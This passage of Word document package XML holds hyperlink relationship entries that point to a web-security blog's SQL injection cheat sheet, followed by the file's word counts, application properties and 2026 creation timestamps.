TargetMode="External"/><Relationship Id="rId82" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.invicti.com/blog/web-security/sql-injection-cheat-sheet" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.invicti.com/blog/web-security/sql-injection-cheat-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7109</Words>
  <Characters>40522</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>337</Lines>
  <Paragraphs>95</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>47536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2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-01-29T12:32:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-01-29T12:32:00Z</dcterms:modified>
</cp:coreProperties>
</file>